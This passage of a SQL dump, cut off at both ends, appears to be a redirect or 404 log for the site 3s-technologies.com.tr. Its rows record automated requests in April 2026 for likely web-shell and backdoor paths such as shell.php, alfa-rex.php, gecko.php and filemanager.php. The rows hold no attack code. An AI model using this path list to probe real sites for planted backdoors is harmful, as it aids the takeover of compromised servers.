00:00:00',301),(60381,'http://www.3s-technologies.com.tr/tr/q7lhrgzoo7ijhnkcedq2cdefault.php',NULL,'','',2,0,'2026-04-02 15:56:25','0000-00-00 00:00:00',301),(60382,'http://www.3s-technologies.com.tr/tr/kthusnjbc8ab0jiryls2jincdefault.php',NULL,'','',1,0,'2026-04-02 15:56:26','0000-00-00 00:00:00',301),(60383,'http://www.3s-technologies.com.tr/tr/only.php',NULL,'','',2,0,'2026-04-02 15:56:27','0000-00-00 00:00:00',301),(60384,'http://www.3s-technologies.com.tr/tr/repurify.php',NULL,'','',1,0,'2026-04-02 15:56:27','0000-00-00 00:00:00',301),(60385,'http://www.3s-technologies.com.tr/tr/tdsaz.php',NULL,'','',1,0,'2026-04-02 15:56:28','0000-00-00 00:00:00',301),(60386,'http://www.3s-technologies.com.tr/tr/hfles.php',NULL,'','',1,0,'2026-04-02 15:56:29','0000-00-00 00:00:00',301),(60387,'http://www.3s-technologies.com.tr/tr/byrgo.php',NULL,'','',7,0,'2026-04-02 15:56:30','0000-00-00 00:00:00',301),(60388,'http://www.3s-technologies.com.tr/tr/wp-class-20260318122951.php',NULL,'','',1,0,'2026-04-02 15:56:31','0000-00-00 00:00:00',301),(60389,'http://www.3s-technologies.com.tr/tr/lupo.php',NULL,'','',2,0,'2026-04-02 15:56:32','0000-00-00 00:00:00',301),(60390,'http://www.3s-technologies.com.tr/tr/wp-moonka.php',NULL,'','',1,0,'2026-04-02 15:56:32','0000-00-00 00:00:00',301),(60391,'http://www.3s-technologies.com.tr/tr/zoper1.php',NULL,'','',4,0,'2026-04-02 15:56:33','0000-00-00 00:00:00',301),(60392,'http://www.3s-technologies.com.tr/tr/ta0ol.php',NULL,'','',4,0,'2026-04-02 15:56:33','0000-00-00 00:00:00',301),(60393,'http://www.3s-technologies.com.tr/tr/irpl4xz4fmlzm4tlvvu4h1mcdefault.php',NULL,'','',2,0,'2026-04-02 15:56:34','0000-00-00 00:00:00',301),(60394,'http://www.3s-technologies.com.tr/tr/wmore1.php',NULL,'','',5,0,'2026-04-02 15:56:34','0000-00-00 00:00:00',301),(60395,'http://www.3s-technologies.com.tr/tr/tx79.php',NULL,'','',5,0,'2026-04-02 15:56:35','0000-00-00 00:00:00',301),(60396,'http://www.3s-technologies.com.tr/tr/ibcqocdtu3eovdx2hwj7cdefault.php',NULL,'','',3,0,'2026-04-02 15:56:36','0000-00-00 00:00:00',301),(60397,'http://www.3s-technologies.com.tr/tr/less.php',NULL,'','',2,0,'2026-04-02 15:56:36','0000-00-00 00:00:00',301),(60398,'http://www.3s-technologies.com.tr/tr/t2gorhwasq4vioshtatw5ecdefault.php',NULL,'','',2,0,'2026-04-02 15:56:37','0000-00-00 00:00:00',301),(60399,'http://www.3s-technologies.com.tr/tr/new3.php',NULL,'','',3,0,'2026-04-02 15:56:38','0000-00-00 00:00:00',301),(60400,'http://www.3s-technologies.com.tr/tr/rogsa.php',NULL,'','',1,0,'2026-04-02 15:56:39','0000-00-00 00:00:00',301),(60401,'http://www.3s-technologies.com.tr/tr/htzevfl4k9ey5hoaywdwicdefault.php',NULL,'','',1,0,'2026-04-02 15:56:40','0000-00-00 00:00:00',301),(60402,'http://www.3s-technologies.com.tr/tr/sadcut1.php',NULL,'','',7,0,'2026-04-02 15:56:41','0000-00-00 00:00:00',301),(60403,'http://www.3s-technologies.com.tr/tr/nhj6t74aqmkde3hgpcdefault.php',NULL,'','',1,0,'2026-04-02 15:56:41','0000-00-00 00:00:00',301),(60404,'http://www.3s-technologies.com.tr/tr/wlld5fjtdpjmjhsds3qzmipfcdefault.php',NULL,'','',2,0,'2026-04-02 15:56:42','0000-00-00 00:00:00',301),(60405,'http://www.3s-technologies.com.tr/tr/ogifomnzqnlvwh5womfjirvacdefault.php',NULL,'','',3,0,'2026-04-02 15:56:42','0000-00-00 00:00:00',301),(60406,'http://www.3s-technologies.com.tr/tr/cdx1.php',NULL,'','',4,0,'2026-04-02 15:56:43','0000-00-00 00:00:00',301),(60407,'http://www.3s-technologies.com.tr/tr/ynjli.php',NULL,'','',1,0,'2026-04-02 15:56:44','0000-00-00 00:00:00',301),(60408,'http://www.3s-technologies.com.tr/tr/a6.php',NULL,'','',1,0,'2026-04-02 15:56:44','0000-00-00 00:00:00',301),(60409,'http://www.3s-technologies.com.tr/tr/mi35rzhmg1zj1vuxdefault.php',NULL,'','',3,0,'2026-04-02 15:56:45','0000-00-00 00:00:00',301),(60410,'http://www.3s-technologies.com.tr/tr/hbvdoz7cy9k6xge9zhuvkvitcdefault.php',NULL,'','',1,0,'2026-04-02 15:56:47','0000-00-00 00:00:00',301),(60411,'http://www.3s-technologies.com.tr/tr/wziar1.php',NULL,'','',3,0,'2026-04-02 15:56:47','0000-00-00 00:00:00',301),(60412,'http://www.3s-technologies.com.tr/tr/fsgdjkl.php',NULL,'','',1,0,'2026-04-02 15:56:47','0000-00-00 00:00:00',301),(60413,'http://www.3s-technologies.com.tr/tr/exhds0ucw0ju9vjgasxqcdefault.php',NULL,'','',2,0,'2026-04-02 15:56:48','0000-00-00 00:00:00',301),(60414,'http://www.3s-technologies.com.tr/tr/cdx2.php',NULL,'','',5,0,'2026-04-02 15:56:49','0000-00-00 00:00:00',301),(60415,'http://www.3s-technologies.com.tr/tr/a8.php',NULL,'','',1,0,'2026-04-02 15:56:49','0000-00-00 00:00:00',301),(60416,'http://www.3s-technologies.com.tr/tr/lmutxdvyp7u5yksqke8ozbjgcdefault.php',NULL,'','',4,0,'2026-04-02 15:56:50','0000-00-00 00:00:00',301),(60417,'http://www.3s-technologies.com.tr/tr/ortasekerli1.php',NULL,'','',7,0,'2026-04-02 15:56:50','0000-00-00 00:00:00',301),(60418,'http://www.3s-technologies.com.tr/tr/a7.php',NULL,'','',6,0,'2026-04-02 15:56:51','0000-00-00 00:00:00',301),(60419,'http://www.3s-technologies.com.tr/tr/index-20260330022921.php',NULL,'','',1,0,'2026-04-02 15:56:52','0000-00-00 00:00:00',301),(60420,'http://www.3s-technologies.com.tr/tr/press.php',NULL,'','',5,0,'2026-04-02 15:56:54','0000-00-00 00:00:00',301),(60421,'http://www.3s-technologies.com.tr/tr/wp-ccv.php',NULL,'','',1,0,'2026-04-02 15:56:54','0000-00-00 00:00:00',301),(60422,'http://www.3s-technologies.com.tr/tr/luyuc.php',NULL,'','',1,0,'2026-04-02 15:56:55','0000-00-00 00:00:00',301),(60423,'http://www.3s-technologies.com.tr/tr/htto.php',NULL,'','',1,0,'2026-04-02 15:56:57','0000-00-00 00:00:00',301),(60424,'http://3s-technologies.com.tr/tr/c6jpzoqvtpyem9hdefault.php',NULL,'','',2,0,'2026-04-02 16:10:54','0000-00-00 00:00:00',301),(60425,'http://3s-technologies.com.tr/tr/efpu3yhnrinnltvdefault.php',NULL,'','',25,0,'2026-04-02 16:10:55','0000-00-00 00:00:00',301),(60426,'http://3s-technologies.com.tr/tr/jkydqumkiarjmj4default.php',NULL,'','',2,0,'2026-04-02 16:10:56','0000-00-00 00:00:00',301),(60427,'http://3s-technologies.com.tr/tr/mfptbopeeg7v0sezxnbtgcgscdefault.php',NULL,'','',2,0,'2026-04-02 16:10:57','0000-00-00 00:00:00',301),(60428,'http://mail.3s-technologies.com.tr/tr/.mopj.php',NULL,'','',4,0,'2026-04-02 17:23:16','0000-00-00 00:00:00',301),(60429,'http://mail.3s-technologies.com.tr/tr/.yuf.php',NULL,'','',1,0,'2026-04-02 17:23:16','0000-00-00 00:00:00',301),(60430,'http://mail.3s-technologies.com.tr/tr/nano.php',NULL,'','',4,0,'2026-04-02 17:23:17','0000-00-00 00:00:00',301),(60431,'http://mail.3s-technologies.com.tr/tr/f35_s.php',NULL,'','',7,0,'2026-04-02 17:23:18','0000-00-00 00:00:00',301),(60432,'http://mail.3s-technologies.com.tr/tr/2026w.php',NULL,'','',13,0,'2026-04-02 17:23:18','0000-00-00 00:00:00',301),(60433,'http://mail.3s-technologies.com.tr/tr/ftde.php',NULL,'','',7,0,'2026-04-02 17:23:19','0000-00-00 00:00:00',301),(60434,'http://mail.3s-technologies.com.tr/tr/file31.php',NULL,'','',3,0,'2026-04-02 17:23:20','0000-00-00 00:00:00',301),(60435,'http://mail.3s-technologies.com.tr/tr/control.php',NULL,'','',2,0,'2026-04-02 17:23:21','0000-00-00 00:00:00',301),(60436,'http://mail.3s-technologies.com.tr/tr/xozx.php',NULL,'','',8,0,'2026-04-02 17:23:22','0000-00-00 00:00:00',301),(60437,'http://mail.3s-technologies.com.tr/tr/1111.php?p=',NULL,'','',2,0,'2026-04-02 17:23:23','0000-00-00 00:00:00',301),(60438,'http://mail.3s-technologies.com.tr/tr/no18.php',NULL,'','',12,0,'2026-04-02 17:23:29','0000-00-00 00:00:00',301),(60439,'http://mail.3s-technologies.com.tr/tr/bless4.php',NULL,'','',5,0,'2026-04-02 17:23:55','0000-00-00 00:00:00',301),(60440,'http://mail.3s-technologies.com.tr/tr/about2.php',NULL,'','',3,0,'2026-04-02 17:24:21','0000-00-00 00:00:00',301),(60441,'http://www.3s-technologies.com.tr/tr/gptsh.php',NULL,'','',5,0,'2026-04-02 21:11:39','0000-00-00 00:00:00',301),(60442,'http://www.3s-technologies.com.tr/tr/.mopj.php',NULL,'','',3,0,'2026-04-02 21:11:50','0000-00-00 00:00:00',301),(60443,'http://www.3s-technologies.com.tr/tr/.yuf.php',NULL,'','',1,0,'2026-04-02 21:11:50','0000-00-00 00:00:00',301),(60444,'http://www.3s-technologies.com.tr/tr/nano.php',NULL,'','',3,0,'2026-04-02 21:11:51','0000-00-00 00:00:00',301),(60445,'http://www.3s-technologies.com.tr/tr/f35_s.php',NULL,'','',3,0,'2026-04-02 21:11:52','0000-00-00 00:00:00',301),(60446,'http://www.3s-technologies.com.tr/tr/2026w.php',NULL,'','',3,0,'2026-04-02 21:11:53','0000-00-00 00:00:00',301),(60447,'http://www.3s-technologies.com.tr/tr/ftde.php',NULL,'','',3,0,'2026-04-02 21:11:53','0000-00-00 00:00:00',301),(60448,'http://www.3s-technologies.com.tr/tr/file31.php',NULL,'','',2,0,'2026-04-02 21:11:54','0000-00-00 00:00:00',301),(60449,'http://www.3s-technologies.com.tr/tr/control.php',NULL,'','',2,0,'2026-04-02 21:11:56','0000-00-00 00:00:00',301),(60450,'http://www.3s-technologies.com.tr/tr/xozx.php',NULL,'','',4,0,'2026-04-02 21:11:56','0000-00-00 00:00:00',301),(60451,'http://www.3s-technologies.com.tr/tr/1111.php?p=',NULL,'','',2,0,'2026-04-02 21:11:57','0000-00-00 00:00:00',301),(60452,'http://www.3s-technologies.com.tr/tr/ass.php',NULL,'','',3,0,'2026-04-02 21:12:01','0000-00-00 00:00:00',301),(60453,'http://www.3s-technologies.com.tr/tr/no18.php',NULL,'','',4,0,'2026-04-02 21:12:03','0000-00-00 00:00:00',301),(60454,'http://www.3s-technologies.com.tr/tr/fine.php',NULL,'','',3,0,'2026-04-02 21:12:03','0000-00-00 00:00:00',301),(60455,'http://www.3s-technologies.com.tr/tr/zample.php',NULL,'','',3,0,'2026-04-02 21:12:04','0000-00-00 00:00:00',301),(60456,'http://www.3s-technologies.com.tr/tr/read.php',NULL,'','',2,0,'2026-04-02 21:12:05','0000-00-00 00:00:00',301),(60457,'http://www.3s-technologies.com.tr/tr/wp-kd4xalrg7m.php',NULL,'','',2,0,'2026-04-02 21:12:06','0000-00-00 00:00:00',301),(60458,'http://www.3s-technologies.com.tr/tr/wp-mter.php',NULL,'','',2,0,'2026-04-02 21:12:10','0000-00-00 00:00:00',301),(60459,'http://www.3s-technologies.com.tr/tr/eee.php',NULL,'','',2,0,'2026-04-02 21:12:17','0000-00-00 00:00:00',301),(60460,'http://www.3s-technologies.com.tr/tr/no1.php',NULL,'','',3,0,'2026-04-02 21:12:18','0000-00-00 00:00:00',301),(60461,'http://www.3s-technologies.com.tr/tr/w2025.php',NULL,'','',3,0,'2026-04-02 21:12:19','0000-00-00 00:00:00',301),(60462,'http://www.3s-technologies.com.tr/tr/swallowable.php',NULL,'','',2,0,'2026-04-02 21:12:19','0000-00-00 00:00:00',301),(60463,'http://www.3s-technologies.com.tr/tr/fvvff.php',NULL,'','',3,0,'2026-04-02 21:12:20','0000-00-00 00:00:00',301),(60464,'http://www.3s-technologies.com.tr/tr/about2.php',NULL,'','',2,0,'2026-04-02 21:12:58','0000-00-00 00:00:00',301),(60465,'http://www.3s-technologies.com.tr/tr/ew.php',NULL,'','',3,0,'2026-04-02 21:13:16','0000-00-00 00:00:00',301),(60466,'http://www.3s-technologies.com.tr/tr/afile.php',NULL,'','',1,0,'2026-04-02 21:13:21','0000-00-00 00:00:00',301),(60467,'http://www.3s-technologies.com.tr/tr/cabs.php',NULL,'','',3,0,'2026-04-02 21:13:22','0000-00-00 00:00:00',301),(60468,'http://www.3s-technologies.com.tr/tr/x1da.php',NULL,'','',3,0,'2026-04-02 21:13:24','0000-00-00 00:00:00',301),(60469,'http://www.3s-technologies.com.tr/tr/ad1.php',NULL,'','',1,0,'2026-04-03 03:00:27','0000-00-00 00:00:00',301),(60470,'http://www.3s-technologies.com.tr/tr/nz.php',NULL,'','',1,0,'2026-04-03 03:00:28','0000-00-00 00:00:00',301),(60471,'http://www.3s-technologies.com.tr/tr/inwp.php',NULL,'','',1,0,'2026-04-03 03:00:28','0000-00-00 00:00:00',301),(60472,'http://www.3s-technologies.com.tr/tr/x7t6.php',NULL,'','',1,0,'2026-04-03 03:00:29','0000-00-00 00:00:00',301),(60473,'http://www.3s-technologies.com.tr/tr/rk41.php',NULL,'','',1,0,'2026-04-03 03:00:31','0000-00-00 00:00:00',301),(60474,'http://www.3s-technologies.com.tr/tr/fgd.php',NULL,'','',1,0,'2026-04-03 03:00:31','0000-00-00 00:00:00',301),(60475,'http://www.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/admin.php',NULL,'','',3,0,'2026-04-03 03:00:32','0000-00-00 00:00:00',301),(60476,'http://www.3s-technologies.com.tr/tr/wp-admin/user/content.php',NULL,'','',1,0,'2026-04-03 03:00:33','0000-00-00 00:00:00',301),(60477,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp.php',NULL,'','',2,0,'2026-04-03 03:00:33','0000-00-00 00:00:00',301),(60478,'http://www.3s-technologies.com.tr/tr/wp-content/plugin.php',NULL,'','',1,0,'2026-04-03 03:00:34','0000-00-00 00:00:00',301),(60479,'http://www.3s-technologies.com.tr/tr/wp-admin/network/chosen.php',NULL,'','',1,0,'2026-04-03 03:00:35','0000-00-00 00:00:00',301),(60480,'http://www.3s-technologies.com.tr/tr/wp-includes/images/chosen.php',NULL,'','',1,0,'2026-04-03 03:00:36','0000-00-00 00:00:00',301),(60481,'http://www.3s-technologies.com.tr/tr/wp-admin/wp-admin.php',NULL,'','',2,0,'2026-04-03 03:00:38','0000-00-00 00:00:00',301),(60482,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/install.php',NULL,'','',1,0,'2026-04-03 03:00:40','0000-00-00 00:00:00',301),(60483,'http://www.3s-technologies.com.tr/tr/admin/ty.php',NULL,'','',1,0,'2026-04-03 03:00:40','0000-00-00 00:00:00',301),(60484,'http://www.3s-technologies.com.tr/tr/wp-admin/upgrade.php',NULL,'','',1,0,'2026-04-03 03:00:41','0000-00-00 00:00:00',301),(60485,'http://www.3s-technologies.com.tr/tr/wp-admin/media.php',NULL,'','',1,0,'2026-04-03 03:00:42','0000-00-00 00:00:00',301),(60486,'http://www.3s-technologies.com.tr/tr/index/lock.php',NULL,'','',1,0,'2026-04-03 03:00:44','0000-00-00 00:00:00',301),(60487,'http://www.3s-technologies.com.tr/tr/assets/edit.php',NULL,'','',3,0,'2026-04-03 03:00:45','0000-00-00 00:00:00',301),(60488,'http://www.3s-technologies.com.tr/tr/wp-admin/user/chosen.php',NULL,'','',2,0,'2026-04-03 03:00:46','0000-00-00 00:00:00',301),(60489,'http://www.3s-technologies.com.tr/tr/wp-includes/assets/themes.php',NULL,'','',1,0,'2026-04-03 03:00:47','0000-00-00 00:00:00',301),(60490,'http://www.3s-technologies.com.tr/tr/wp-includes/text/wp.php',NULL,'','',1,0,'2026-04-03 03:00:49','0000-00-00 00:00:00',301),(60491,'http://www.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rk2.php',NULL,'','',1,0,'2026-04-03 03:00:54','0000-00-00 00:00:00',301),(60492,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/wp-login.php',NULL,'','',1,0,'2026-04-03 03:00:55','0000-00-00 00:00:00',301),(60493,'http://www.3s-technologies.com.tr/tr/wp-admin/images/users.php',NULL,'','',1,0,'2026-04-03 03:01:01','0000-00-00 00:00:00',301),(60494,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/index.php',NULL,'','',2,0,'2026-04-03 03:01:01','0000-00-00 00:00:00',301),(60495,'http://www.3s-technologies.com.tr/tr/wp-includes/js/wp-login.php',NULL,'','',2,0,'2026-04-03 03:01:02','0000-00-00 00:00:00',301),(60496,'http://www.3s-technologies.com.tr/tr/js/fm.php',NULL,'','',1,0,'2026-04-03 03:01:03','0000-00-00 00:00:00',301),(60497,'http://www.3s-technologies.com.tr/tr/wp-includes/text/network.php',NULL,'','',1,0,'2026-04-03 03:01:04','0000-00-00 00:00:00',301),(60498,'http://www.3s-technologies.com.tr/tr/wordpress/wp-includes/wp-config-sample.php',NULL,'','',1,0,'2026-04-03 03:01:05','0000-00-00 00:00:00',301),(60499,'http://www.3s-technologies.com.tr/tr/images/cjfuns.php',NULL,'','',1,0,'2026-04-03 03:01:06','0000-00-00 00:00:00',301),(60500,'http://www.3s-technologies.com.tr/tr/js/style.php',NULL,'','',1,0,'2026-04-03 03:01:07','0000-00-00 00:00:00',301),(60501,'http://www.3s-technologies.com.tr/tr/index/x.php',NULL,'','',2,0,'2026-04-03 03:01:07','0000-00-00 00:00:00',301),(60502,'http://www.3s-technologies.com.tr/tr/wp-content/languages/chosen.php',NULL,'','',1,0,'2026-04-03 03:01:08','0000-00-00 00:00:00',301),(60503,'http://www.3s-technologies.com.tr/tr/wp-content/themes/classic/inc/json.php',NULL,'','',1,0,'2026-04-03 03:01:08','0000-00-00 00:00:00',301),(60504,'http://www.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/core32.php',NULL,'','',1,0,'2026-04-03 03:01:09','0000-00-00 00:00:00',301),(60505,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/index.php',NULL,'','',1,0,'2026-04-03 03:01:10','0000-00-00 00:00:00',301),(60506,'http://www.3s-technologies.com.tr/tr/uploads/test.php',NULL,'','',1,0,'2026-04-03 03:01:10','0000-00-00 00:00:00',301),(60507,'http://www.3s-technologies.com.tr/tr/wp-includes/style-engine/wp-login.php',NULL,'','',1,0,'2026-04-03 03:01:13','0000-00-00 00:00:00',301),(60508,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/about.php',NULL,'','',1,0,'2026-04-03 03:01:15','0000-00-00 00:00:00',301),(60509,'http://www.3s-technologies.com.tr/tr/wp-admin/wp-conflg.php',NULL,'','',1,0,'2026-04-03 03:01:15','0000-00-00 00:00:00',301),(60510,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/admin.php',NULL,'','',11,0,'2026-04-03 03:16:41','0000-00-00 00:00:00',301),(60511,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/admin.php',NULL,'','',11,0,'2026-04-03 03:17:05','0000-00-00 00:00:00',301),(60512,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/install.php',NULL,'','',6,0,'2026-04-03 03:17:16','0000-00-00 00:00:00',301),(60513,'http://mail.3s-technologies.com.tr/tr/admin/ty.php',NULL,'','',6,0,'2026-04-03 03:17:17','0000-00-00 00:00:00',301),(60514,'http://mail.3s-technologies.com.tr/tr/wp-admin/upgrade.php',NULL,'','',6,0,'2026-04-03 03:17:17','0000-00-00 00:00:00',301),(60515,'http://mail.3s-technologies.com.tr/tr/wp-admin/media.php',NULL,'','',6,0,'2026-04-03 03:17:18','0000-00-00 00:00:00',301),(60516,'http://mail.3s-technologies.com.tr/tr/images/cjfuns.php',NULL,'','',6,0,'2026-04-03 03:17:43','0000-00-00 00:00:00',301),(60517,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/core32.php',NULL,'','',6,0,'2026-04-03 03:17:47','0000-00-00 00:00:00',301),(60518,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/index.php',NULL,'','',6,0,'2026-04-03 03:17:48','0000-00-00 00:00:00',301),(60519,'http://mail.3s-technologies.com.tr/tr/uploads/test.php',NULL,'','',6,0,'2026-04-03 03:17:48','0000-00-00 00:00:00',301),(60520,'http://mail.3s-technologies.com.tr/tr/public/mi35rzhmg1zj1vuxdefault.php',NULL,'','',11,0,'2026-04-03 10:20:00','0000-00-00 00:00:00',301),(60521,'http://mail.3s-technologies.com.tr/tr/hhxc.php',NULL,'','',10,0,'2026-04-03 10:20:39','0000-00-00 00:00:00',301),(60522,'http://3s-technologies.com.tr/tr/wp-content/ssd/sallu.php',NULL,'','',3,0,'2026-04-03 15:03:54','0000-00-00 00:00:00',301),(60523,'http://3s-technologies.com.tr/tr/public/filemanager.php',NULL,'','',3,0,'2026-04-03 15:04:33','0000-00-00 00:00:00',301),(60524,'http://3s-technologies.com.tr/tr/wp-content/voga/sallu.php',NULL,'','',3,0,'2026-04-03 15:04:34','0000-00-00 00:00:00',301),(60525,'http://3s-technologies.com.tr/tr/public/manager.php',NULL,'','',3,0,'2026-04-03 15:04:50','0000-00-00 00:00:00',301),(60526,'http://www.3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/filemanager.php',NULL,'','',1,0,'2026-04-03 18:21:33','0000-00-00 00:00:00',301),(60527,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/index.php',NULL,'','',1,0,'2026-04-03 18:21:34','0000-00-00 00:00:00',301),(60528,'http://www.3s-technologies.com.tr/tr/libraries/legacy/info.php',NULL,'','',1,0,'2026-04-03 18:21:36','0000-00-00 00:00:00',301),(60529,'http://www.3s-technologies.com.tr/tr/wp-admin/images/install.php',NULL,'','',1,0,'2026-04-03 18:21:38','0000-00-00 00:00:00',301),(60530,'http://www.3s-technologies.com.tr/tr/.well-known/link.php',NULL,'','',1,0,'2026-04-03 18:21:39','0000-00-00 00:00:00',301),(60531,'http://www.3s-technologies.com.tr/tr/wp-admin/chosen.php',NULL,'','',3,0,'2026-04-03 18:21:39','0000-00-00 00:00:00',301),(60532,'http://www.3s-technologies.com.tr/tr/wp-includes/assets/about.php',NULL,'','',1,0,'2026-04-03 18:21:41','0000-00-00 00:00:00',301),(60533,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/wp-login.php',NULL,'','',1,0,'2026-04-03 18:21:42','0000-00-00 00:00:00',301),(60534,'http://www.3s-technologies.com.tr/tr/assets/item.php',NULL,'','',2,0,'2026-04-03 18:21:43','0000-00-00 00:00:00',301),(60535,'http://www.3s-technologies.com.tr/tr/shop/lock.php',NULL,'','',1,0,'2026-04-03 18:21:43','0000-00-00 00:00:00',301),(60536,'http://www.3s-technologies.com.tr/tr/th/plugins/phpthumb/404.php',NULL,'','',1,0,'2026-04-03 18:21:44','0000-00-00 00:00:00',301),(60537,'http://www.3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/index.php',NULL,'','',1,0,'2026-04-03 18:21:45','0000-00-00 00:00:00',301),(60538,'http://www.3s-technologies.com.tr/tr/files/log.php',NULL,'','',1,0,'2026-04-03 18:21:45','0000-00-00 00:00:00',301),(60539,'http://www.3s-technologies.com.tr/tr/wp-includes/html-api/index.php',NULL,'','',1,0,'2026-04-03 18:21:46','0000-00-00 00:00:00',301),(60540,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/cache/content.php',NULL,'','',1,0,'2026-04-03 18:21:49','0000-00-00 00:00:00',301),(60541,'http://www.3s-technologies.com.tr/tr/wp-content/themes/xmrlpc.php',NULL,'','',1,0,'2026-04-03 18:21:51','0000-00-00 00:00:00',301),(60542,'http://www.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/taptap-null.php',NULL,'','',1,0,'2026-04-03 18:21:52','0000-00-00 00:00:00',301),(60543,'http://www.3s-technologies.com.tr/tr/.well-known/as.php',NULL,'','',1,0,'2026-04-03 18:21:53','0000-00-00 00:00:00',301),(60544,'http://www.3s-technologies.com.tr/tr/wp-includes/customize/wp-login.php',NULL,'','',1,0,'2026-04-03 18:21:53','0000-00-00 00:00:00',301),(60545,'http://www.3s-technologies.com.tr/tr/.well-known/lv.php',NULL,'','',1,0,'2026-04-03 18:21:54','0000-00-00 00:00:00',301),(60546,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/shell.php',NULL,'','',1,0,'2026-04-03 18:21:58','0000-00-00 00:00:00',301),(60547,'http://www.3s-technologies.com.tr/tr/wp-admin/user/bak.php',NULL,'','',1,0,'2026-04-03 18:21:59','0000-00-00 00:00:00',301),(60548,'http://www.3s-technologies.com.tr/tr/wp-admin/date.php',NULL,'','',1,0,'2026-04-03 18:22:01','0000-00-00 00:00:00',301),(60549,'http://www.3s-technologies.com.tr/tr/wp-includes/network.php',NULL,'','',1,0,'2026-04-03 18:22:02','0000-00-00 00:00:00',301),(60550,'http://www.3s-technologies.com.tr/tr/.well-known/.well-known/cc.php',NULL,'','',1,0,'2026-04-03 18:22:03','0000-00-00 00:00:00',301),(60551,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/chosen.php',NULL,'','',1,0,'2026-04-03 18:22:04','0000-00-00 00:00:00',301),(60552,'http://www.3s-technologies.com.tr/tr/css/cong.php',NULL,'','',1,0,'2026-04-03 18:22:04','0000-00-00 00:00:00',301),(60553,'http://www.3s-technologies.com.tr/tr/wp-includes/customize/shell.php',NULL,'','',1,0,'2026-04-03 18:22:05','0000-00-00 00:00:00',301),(60554,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/admin.php',NULL,'','',1,0,'2026-04-03 18:22:06','0000-00-00 00:00:00',301),(60555,'http://www.3s-technologies.com.tr/tr/wp-includes/block-supports/variations.php',NULL,'','',1,0,'2026-04-03 18:22:08','0000-00-00 00:00:00',301),(60556,'http://www.3s-technologies.com.tr/tr/wp-includes/rest-api/wp-login.php',NULL,'','',1,0,'2026-04-03 18:22:08','0000-00-00 00:00:00',301),(60557,'http://www.3s-technologies.com.tr/tr/plugins/daozm.php',NULL,'','',1,0,'2026-04-03 18:22:12','0000-00-00 00:00:00',301),(60558,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/gecko.php',NULL,'','',1,0,'2026-04-03 18:22:13','0000-00-00 00:00:00',301),(60559,'http://www.3s-technologies.com.tr/tr/wp-admin/network/lock.php',NULL,'','',1,0,'2026-04-03 18:22:14','0000-00-00 00:00:00',301),(60560,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/system.php',NULL,'','',1,0,'2026-04-03 18:22:16','0000-00-00 00:00:00',301),(60561,'http://www.3s-technologies.com.tr/tr/about/wp-conflg.php',NULL,'','',1,0,'2026-04-03 18:22:16','0000-00-00 00:00:00',301),(60562,'http://www.3s-technologies.com.tr/tr/assets/admin.php',NULL,'','',2,0,'2026-04-03 18:22:17','0000-00-00 00:00:00',301),(60563,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps/alfa-rex.php',NULL,'','',1,0,'2026-04-03 18:22:17','0000-00-00 00:00:00',301),(60564,'http://www.3s-technologies.com.tr/tr/wp-content/blue.php',NULL,'','',1,0,'2026-04-03 18:22:20','0000-00-00 00:00:00',301),(60565,'http://www.3s-technologies.com.tr/tr/wp-content/configs.php',NULL,'','',1,0,'2026-04-03 18:22:20','0000-00-00 00:00:00',301),(60566,'http://www.3s-technologies.com.tr/tr/wp-includes/images/media/about.php',NULL,'','',1,0,'2026-04-03 18:22:21','0000-00-00 00:00:00',301),(60567,'http://www.3s-technologies.com.tr/tr/wp-admin/plugin.php',NULL,'','',1,0,'2026-04-03 18:22:23','0000-00-00 00:00:00',301),(60568,'http://www.3s-technologies.com.tr/tr/images/autoload_classmap.php',NULL,'','',1,0,'2026-04-03 18:22:25','0000-00-00 00:00:00',301),(60569,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/link.php',NULL,'','',1,0,'2026-04-03 18:22:28','0000-00-00 00:00:00',301),(60570,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/plugins.php',NULL,'','',1,0,'2026-04-03 18:22:29','0000-00-00 00:00:00',301),(60571,'http://www.3s-technologies.com.tr/tr/wp-includes/rest-api/alfa-rex.php',NULL,'','',1,0,'2026-04-03 18:22:30','0000-00-00 00:00:00',301),(60572,'http://www.3s-technologies.com.tr/tr/gecko.php',NULL,'','',2,0,'2026-04-03 18:22:31','0000-00-00 00:00:00',301),(60573,'http://www.3s-technologies.com.tr/tr/wp-includes/html-api/wp-login.php',NULL,'','',1,0,'2026-04-03 18:22:32','0000-00-00 00:00:00',301),(60574,'http://www.3s-technologies.com.tr/tr/wp-includes/images/crystal/about.php',NULL,'','',1,0,'2026-04-03 18:22:33','0000-00-00 00:00:00',301),(60575,'http://www.3s-technologies.com.tr/tr/wp-content/file.php',NULL,'','',1,0,'2026-04-03 18:22:34','0000-00-00 00:00:00',301),(60576,'http://www.3s-technologies.com.tr/tr/.well-known/pkivalidation/log.php',NULL,'','',1,0,'2026-04-03 18:22:34','0000-00-00 00:00:00',301),(60577,'http://www.3s-technologies.com.tr/tr/wp-admin/packed.php',NULL,'','',1,0,'2026-04-03 18:22:36','0000-00-00 00:00:00',301),(60578,'http://www.3s-technologies.com.tr/tr/wp-content/config.php',NULL,'','',1,0,'2026-04-03 